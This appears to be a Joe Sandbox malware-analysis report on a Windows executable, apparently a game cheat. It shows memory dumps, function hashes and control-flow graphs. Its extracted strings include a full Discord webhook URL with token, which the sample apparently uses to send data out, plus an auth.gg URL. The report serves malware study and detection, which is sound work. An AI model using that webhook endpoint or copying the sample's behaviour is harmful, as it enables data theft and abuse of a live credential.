                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9389
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B93CE
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9413
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9458
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B949D
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B94E2
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9527
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B956C
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B95B1
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B95F6
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B963B
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C77D0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF68B4B2701), ref: 00007FF68B4C7828
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B9680
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B96C5
                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4B970A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy$Concurrency::cancel_current_task
                                                                                                                                                                                                      • String ID: https://auth.gg/$https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwOfglnFe9ULMgnrQPphdYlK$success
                                                                                                                                                                                                      • API String ID: 73660495-2681837100
                                                                                                                                                                                                      • Opcode ID: 16fb97de7e87b266f899160ba4c753a49c8520d58aa95855b6988663c97e59e3
                                                                                                                                                                                                      • Instruction ID: 4407257853c85852608059138535aa5973c6f70d91d472d6f97f19d400c95fe2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16fb97de7e87b266f899160ba4c753a49c8520d58aa95855b6988663c97e59e3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A13B652E65BC684FB20DB35C8423FD1311BFEA784F10672AE55D979AADF68B684C300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Gold 1
                                                                                                                                                                                                      • API String ID: 3063020102-1116304436
                                                                                                                                                                                                      • Opcode ID: c4d1df142aba2d168b106aebbd2178e24ac5d40c98f659303f1b7d1ea7051dd7
                                                                                                                                                                                                      • Instruction ID: 6d7e303adac7927ad82dfa659f0a6289810c3ed5e4467ffe5ccfa9b3dfdf195f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4d1df142aba2d168b106aebbd2178e24ac5d40c98f659303f1b7d1ea7051dd7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0582E022A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Silver 3
                                                                                                                                                                                                      • API String ID: 3063020102-3638036111
                                                                                                                                                                                                      • Opcode ID: 14a15e9a4b23784bfde5c8018b46a5709d181cf56b1179ec34f6d0abb83ebcae
                                                                                                                                                                                                      • Instruction ID: a43c291d3e67ed27d0c80c10f17e6a1ef904f11380e83e1d9b50769aac05201f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14a15e9a4b23784bfde5c8018b46a5709d181cf56b1179ec34f6d0abb83ebcae
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C982E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Gold 3
                                                                                                                                                                                                      • API String ID: 3063020102-2894533912
                                                                                                                                                                                                      • Opcode ID: 1bfdc7d8b3af4c6d2a5a1e028570c65e662187b4933847e60e4f58ed0dbbc3ee
                                                                                                                                                                                                      • Instruction ID: 2b08ef1503188e2113f65c257b4571fb85073d163098916acae5442ad5ed325d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bfdc7d8b3af4c6d2a5a1e028570c65e662187b4933847e60e4f58ed0dbbc3ee
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F782E022A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Gold 2
                                                                                                                                                                                                      • API String ID: 3063020102-3682608526
                                                                                                                                                                                                      • Opcode ID: 52aca5cf23fe47dd806bd67c970345eb107ca6590d194b4c5a4228492483f948
                                                                                                                                                                                                      • Instruction ID: b5eedfa796be1163da25930141cb678081f96b156ff4ba62b37467f139a1584e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 52aca5cf23fe47dd806bd67c970345eb107ca6590d194b4c5a4228492483f948
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 1986 7ff68b4c264f-7ff68b4c283f call 7ff68b4c7ef0 call 7ff68b482c40 1995 7ff68b4c2845-7ff68b4c284c 1986->1995 1996 7ff68b4c28e6-7ff68b4c28fb 1986->1996 1997 7ff68b4c2850-7ff68b4c2858 1995->1997 1998 7ff68b4c292e-7ff68b4c2964 call 7ff68b4be8c0 1996->1998 1999 7ff68b4c28fd-7ff68b4c290b 1996->1999 1997->1997 2000 7ff68b4c285a-7ff68b4c2860 1997->2000 2008 7ff68b4c29f6-7ff68b4c2a03 1998->2008 2009 7ff68b4c296a-7ff68b4c2987 call 7ff68b4b2530 1998->2009 2001 7ff68b4c2926-7ff68b4c2929 call 7ff68b4cad80 1999->2001 2002 7ff68b4c290d-7ff68b4c2920 1999->2002 2000->1996 2005 7ff68b4c2866-7ff68b4c28df call 7ff68b4a1a40 2000->2005 2001->1998 2002->2001 2006 7ff68b4c3557-7ff68b4c355d _invalid_parameter_noinfo_noreturn 2002->2006 2005->1996 2010 7ff68b4c355e-7ff68b4c3564 _invalid_parameter_noinfo_noreturn 2006->2010 2015 7ff68b4c2a09-7ff68b4c2a1d 2008->2015 2016 7ff68b4c2e4b-7ff68b4c2f02 call 7ff68b482c40 call 7ff68b49e250 2008->2016 2022 7ff68b4c2989 2009->2022 2023 7ff68b4c298c-7ff68b4c29a7 call 7ff68b4c7e40 2009->2023 2013 7ff68b4c3565-7ff68b4c356b _invalid_parameter_noinfo_noreturn 2010->2013 2018 7ff68b4c356c-7ff68b4c3572 _invalid_parameter_noinfo_noreturn 2013->2018 2021 7ff68b4c2a20-7ff68b4c2a48 2015->2021 2047 7ff68b4c2f08-7ff68b4c311c sinf cosf atan2f sinf cosf sinf cosf sinf cosf sinf cosf call 7ff68b4c8470 * 2 call 7ff68b482c40 2016->2047 2048 7ff68b4c337d-7ff68b4c33ea pow * 2 2016->2048 2024 7ff68b4c3573-7ff68b4c3579 _invalid_parameter_noinfo_noreturn 2018->2024 2021->2021 2026 7ff68b4c2a4a-7ff68b4c2be8 call 7ff68b4c9c30 memcpy * 3 call 7ff68b4c7e40 2021->2026 2022->2023 2036 7ff68b4c29a9-7ff68b4c29bd 2023->2036 2037 7ff68b4c29dd-7ff68b4c29ef 2023->2037 2027 7ff68b4c357a-7ff68b4c3580 _invalid_parameter_noinfo_noreturn 2024->2027 2092 7ff68b4c2c1e-7ff68b4c2c3f 2026->2092 2093 7ff68b4c2bea-7ff68b4c2bfe 2026->2093 2031 7ff68b4c3581-7ff68b4c3587 _invalid_parameter_noinfo_noreturn 2027->2031 2035 7ff68b4c3588-7ff68b4c358e _invalid_parameter_noinfo_noreturn 2031->2035 2040 7ff68b4c358f-7ff68b4c359f call 7ff68b4cad80 2035->2040 2041 7ff68b4c29bf-7ff68b4c29d2 2036->2041 2042 7ff68b4c29d8 call 7ff68b4cad80 2036->2042 2037->2008 2055 7ff68b4c35a6-7ff68b4c35b0 2040->2055 2041->2010 2041->2042 2042->2037 2096 7ff68b4c3122-7ff68b4c3132 2047->2096 2097 7ff68b4c3258-7ff68b4c32dc call 7ff68b4b1200 call 7ff68b4c7830 call 7ff68b4b11a0 2047->2097 2061 7ff68b4c3410-7ff68b4c341b 2048->2061 2062 7ff68b4c33ec-7ff68b4c33fb 2048->2062 2059 7ff68b4c35b2-7ff68b4c35ca 2055->2059 2060 7ff68b4c35ed-7ff68b4c3654 call 7ff68b4ca930 2055->2060 2068 7ff68b4c35e8 call 7ff68b4cad80 2059->2068 2069 7ff68b4c35cc-7ff68b4c35df 2059->2069 2063 7ff68b4c3451-7ff68b4c3475 2061->2063 2064 7ff68b4c341d-7ff68b4c3431 2061->2064 2062->2061 2070 7ff68b4c33fd-7ff68b4c3409 2062->2070 2076 7ff68b4c3477-7ff68b4c348b 2063->2076 2077 7ff68b4c34ab-7ff68b4c34ea 2063->2077 2072 7ff68b4c3433-7ff68b4c3446 2064->2072 2073 7ff68b4c344c call 7ff68b4cad80 2064->2073 2068->2060 2069->2068 2079 7ff68b4c35e1-7ff68b4c35e7 _invalid_parameter_noinfo_noreturn 2069->2079 2070->2061 2072->2031 2072->2073 2073->2063 2082 7ff68b4c34a6 call 7ff68b4cad80 2076->2082 2083 7ff68b4c348d-7ff68b4c34a0 2076->2083 2077->2055 2091 7ff68b4c34f0-7ff68b4c3504 2077->2091 2079->2068 2082->2077 2083->2035 2083->2082 2091->2040 2098 7ff68b4c350a-7ff68b4c351d 2091->2098 2094 7ff68b4c2c41-7ff68b4c2c52 2092->2094 2095 7ff68b4c2c72-7ff68b4c2d60 call 7ff68b482c40 2092->2095 2099 7ff68b4c2c00-7ff68b4c2c13 2093->2099 2100 7ff68b4c2c19 call 7ff68b4cad80 2093->2100 2102 7ff68b4c2c54-7ff68b4c2c67 2094->2102 2103 7ff68b4c2c6d call 7ff68b4cad80 2094->2103 2131 7ff68b4c2d66-7ff68b4c2d6d 2095->2131 2132 7ff68b4c2dfb-7ff68b4c2dff 2095->2132 2105 7ff68b4c3134-7ff68b4c3155 2096->2105 2106 7ff68b4c315d-7ff68b4c317e 2096->2106 2140 7ff68b4c32de-7ff68b4c3343 call 7ff68b4a1820 2097->2140 2141 7ff68b4c334a-7ff68b4c334e 2097->2141 2098->2040 2108 7ff68b4c351f-7ff68b4c3556 _invalid_parameter_noinfo_noreturn * 8 2098->2108 2099->2013 2099->2100 2100->2092 2102->2018 2102->2103 2103->2095 2125 7ff68b4c3158 call 7ff68b493280 2105->2125 2112 7ff68b4c3180-7ff68b4c31a1 2106->2112 2113 7ff68b4c31a9-7ff68b4c31ca 2106->2113 2108->2006 2127 7ff68b4c31a4 call 7ff68b493280 2112->2127 2115 7ff68b4c31f5-7ff68b4c323a call 7ff68b49c550 2113->2115 2116 7ff68b4c31cc-7ff68b4c31ed 2113->2116 2137 7ff68b4c3255 2115->2137 2138 7ff68b4c323c-7ff68b4c324d 2115->2138 2136 7ff68b4c31f0 call 7ff68b493280 2116->2136 2125->2106 2127->2113 2139 7ff68b4c2d70-7ff68b4c2d78 2131->2139 2134 7ff68b4c2e01-7ff68b4c2e0f 2132->2134 2135 7ff68b4c2e32-7ff68b4c2e44 2132->2135 2142 7ff68b4c2e11-7ff68b4c2e24 2134->2142 2143 7ff68b4c2e2a-7ff68b4c2e2d call 7ff68b4cad80 2134->2143 2135->2016 2136->2115 2137->2097 2144 7ff68b4c3250 call 7ff68b493280 2138->2144 2139->2139 2145 7ff68b4c2d7a-7ff68b4c2d80 2139->2145 2140->2141 2141->2048 2148 7ff68b4c3350-7ff68b4c335d 2141->2148 2142->2024 2142->2143 2143->2135 2144->2137 2145->2132 2149 7ff68b4c2d82-7ff68b4c2df4 call 7ff68b4a1a40 2145->2149 2151 7ff68b4c335f-7ff68b4c3372 2148->2151 2152 7ff68b4c3378 call 7ff68b4cad80 2148->2152 2149->2132 2151->2027 2151->2152 2152->2048
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                                                      • String ID: Bronze 2
                                                                                                                                                                                                      • API String ID: 3063020102-3170931529
                                                                                                                                                                                                      • Opcode ID: 6268dcc4aadb01be096e14f2a137f7fd786fc46b922ded0ffff73a02fc1771fb
                                                                                                                                                                                                      • Instruction ID: f04e3700fcd99425c6e69bb106cddda88c245243adc820ebb93c0e0a8a6d1018
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6268dcc4aadb01be096e14f2a137f7fd786fc46b922ded0ffff73a02fc1771fb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 1816 7ff68b4c2643-7ff68b4c283f call 7ff68b4c7ef0 call 7ff68b482c40 1825 7ff68b4c2845-7ff68b4c284c 1816->1825 1826 7ff68b4c28e6-7ff68b4c28fb 1816->1826 1827 7ff68b4c2850-7ff68b4c2858 1825->1827 1828 7ff68b4c292e-7ff68b4c2964 call 7ff68b4be8c0 1826->1828 1829 7ff68b4c28fd-7ff68b4c290b 1826->1829 1827->1827 1830 7ff68b4c285a-7ff68b4c2860 1827->1830 1838 7ff68b4c29f6-7ff68b4c2a03 1828->1838 1839 7ff68b4c296a-7ff68b4c2987 call 7ff68b4b2530 1828->1839 1831 7ff68b4c2926-7ff68b4c2929 call 7ff68b4cad80 1829->1831 1832 7ff68b4c290d-7ff68b4c2920 1829->1832 1830->1826 1835 7ff68b4c2866-7ff68b4c28df call 7ff68b4a1a40 1830->1835 1831->1828 1832->1831 1836 7ff68b4c3557-7ff68b4c355d _invalid_parameter_noinfo_noreturn 1832->1836 1835->1826 1840 7ff68b4c355e-7ff68b4c3564 _invalid_parameter_noinfo_noreturn 1836->1840 1845 7ff68b4c2a09-7ff68b4c2a1d 1838->1845 1846 7ff68b4c2e4b-7ff68b4c2f02 call 7ff68b482c40 call 7ff68b49e250 1838->1846 1852 7ff68b4c2989 1839->1852 1853 7ff68b4c298c-7ff68b4c29a7 call 7ff68b4c7e40 1839->1853 1843 7ff68b4c3565-7ff68b4c356b _invalid_parameter_noinfo_noreturn 1840->1843 1848 7ff68b4c356c-7ff68b4c3572 _invalid_parameter_noinfo_noreturn 1843->1848 1851 7ff68b4c2a20-7ff68b4c2a48 1845->1851 1877 7ff68b4c2f08-7ff68b4c311c sinf cosf atan2f sinf cosf sinf cosf sinf cosf sinf cosf call 7ff68b4c8470 * 2 call 7ff68b482c40 1846->1877 1878 7ff68b4c337d-7ff68b4c33ea pow * 2 1846->1878 1854 7ff68b4c3573-7ff68b4c3579 _invalid_parameter_noinfo_noreturn 1848->1854 1851->1851 1856 7ff68b4c2a4a-7ff68b4c2be8 call 7ff68b4c9c30 memcpy * 3 call 7ff68b4c7e40 1851->1856 1852->1853 1866 7ff68b4c29a9-7ff68b4c29bd 1853->1866 1867 7ff68b4c29dd-7ff68b4c29ef 1853->1867 1857 7ff68b4c357a-7ff68b4c3580 _invalid_parameter_noinfo_noreturn 1854->1857 1922 7ff68b4c2c1e-7ff68b4c2c3f 1856->1922 1923 7ff68b4c2bea-7ff68b4c2bfe 1856->1923 1861 7ff68b4c3581-7ff68b4c3587 _invalid_parameter_noinfo_noreturn 1857->1861 1865 7ff68b4c3588-7ff68b4c358e _invalid_parameter_noinfo_noreturn 1861->1865 1870 7ff68b4c358f-7ff68b4c359f call 7ff68b4cad80 1865->1870 1871 7ff68b4c29bf-7ff68b4c29d2 1866->1871 1872 7ff68b4c29d8 call 7ff68b4cad80 1866->1872 1867->1838 1885 7ff68b4c35a6-7ff68b4c35b0 1870->1885 1871->1840 1871->1872 1872->1867 1926 7ff68b4c3122-7ff68b4c3132 1877->1926 1927 7ff68b4c3258-7ff68b4c32dc call 7ff68b4b1200 call 7ff68b4c7830 call 7ff68b4b11a0 1877->1927 1891 7ff68b4c3410-7ff68b4c341b 1878->1891 1892 7ff68b4c33ec-7ff68b4c33fb 1878->1892 1889 7ff68b4c35b2-7ff68b4c35ca 1885->1889 1890 7ff68b4c35ed-7ff68b4c3654 call 7ff68b4ca930 1885->1890 1898 7ff68b4c35e8 call 7ff68b4cad80 1889->1898 1899 7ff68b4c35cc-7ff68b4c35df 1889->1899 1893 7ff68b4c3451-7ff68b4c3475 1891->1893 1894 7ff68b4c341d-7ff68b4c3431 1891->1894 1892->1891 1900 7ff68b4c33fd-7ff68b4c3409 1892->1900 1906 7ff68b4c3477-7ff68b4c348b 1893->1906 1907 7ff68b4c34ab-7ff68b4c34ea 1893->1907 1902 7ff68b4c3433-7ff68b4c3446 1894->1902 1903 7ff68b4c344c call 7ff68b4cad80 1894->1903 1898->1890 1899->1898 1909 7ff68b4c35e1-7ff68b4c35e7 _invalid_parameter_noinfo_noreturn 1899->1909 1900->1891 1902->1861 1902->1903 1903->1893 1912 7ff68b4c34a6 call 7ff68b4cad80 1906->1912 1913 7ff68b4c348d-7ff68b4c34a0 1906->1913 1907->1885 1921 7ff68b4c34f0-7ff68b4c3504 1907->1921 1909->1898 1912->1907 1913->1865 1913->1912 1921->1870 1928 7ff68b4c350a-7ff68b4c351d 1921->1928 1924 7ff68b4c2c41-7ff68b4c2c52 1922->1924 1925 7ff68b4c2c72-7ff68b4c2d60 call 7ff68b482c40 1922->1925 1929 7ff68b4c2c00-7ff68b4c2c13 1923->1929 1930 7ff68b4c2c19 call 7ff68b4cad80 1923->1930 1932 7ff68b4c2c54-7ff68b4c2c67 1924->1932 1933 7ff68b4c2c6d call 7ff68b4cad80 1924->1933 1961 7ff68b4c2d66-7ff68b4c2d6d 1925->1961 1962 7ff68b4c2dfb-7ff68b4c2dff 1925->1962 1935 7ff68b4c3134-7ff68b4c3155 1926->1935 1936 7ff68b4c315d-7ff68b4c317e 1926->1936 1970 7ff68b4c32de-7ff68b4c3343 call 7ff68b4a1820 1927->1970 1971 7ff68b4c334a-7ff68b4c334e 1927->1971 1928->1870 1938 7ff68b4c351f-7ff68b4c3556 _invalid_parameter_noinfo_noreturn * 8 1928->1938 1929->1843 1929->1930 1930->1922 1932->1848 1932->1933 1933->1925 1955 7ff68b4c3158 call 7ff68b493280 1935->1955 1942 7ff68b4c3180-7ff68b4c31a1 1936->1942 1943 7ff68b4c31a9-7ff68b4c31ca 1936->1943 1938->1836 1957 7ff68b4c31a4 call 7ff68b493280 1942->1957 1945 7ff68b4c31f5-7ff68b4c323a call 7ff68b49c550 1943->1945 1946 7ff68b4c31cc-7ff68b4c31ed 1943->1946 1967 7ff68b4c3255 1945->1967 1968 7ff68b4c323c-7ff68b4c324d 1945->1968 1966 7ff68b4c31f0 call 7ff68b493280 1946->1966 1955->1936 1957->1943 1969 7ff68b4c2d70-7ff68b4c2d78 1961->1969 1964 7ff68b4c2e01-7ff68b4c2e0f 1962->1964 1965 7ff68b4c2e32-7ff68b4c2e44 1962->1965 1972 7ff68b4c2e11-7ff68b4c2e24 1964->1972 1973 7ff68b4c2e2a-7ff68b4c2e2d call 7ff68b4cad80 1964->1973 1965->1846 1966->1945 1967->1927 1974 7ff68b4c3250 call 7ff68b493280 1968->1974 1969->1969 1975 7ff68b4c2d7a-7ff68b4c2d80 1969->1975 1970->1971 1971->1878 1978 7ff68b4c3350-7ff68b4c335d 1971->1978 1972->1854 1972->1973 1973->1965 1974->1967 1975->1962 1979 7ff68b4c2d82-7ff68b4c2df4 call 7ff68b4a1a40 1975->1979 1981 7ff68b4c335f-7ff68b4c3372 1978->1981 1982 7ff68b4c3378 call 7ff68b4cad80 1978->1982 1979->1962 1981->1857 1981->1982 1982->1878
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
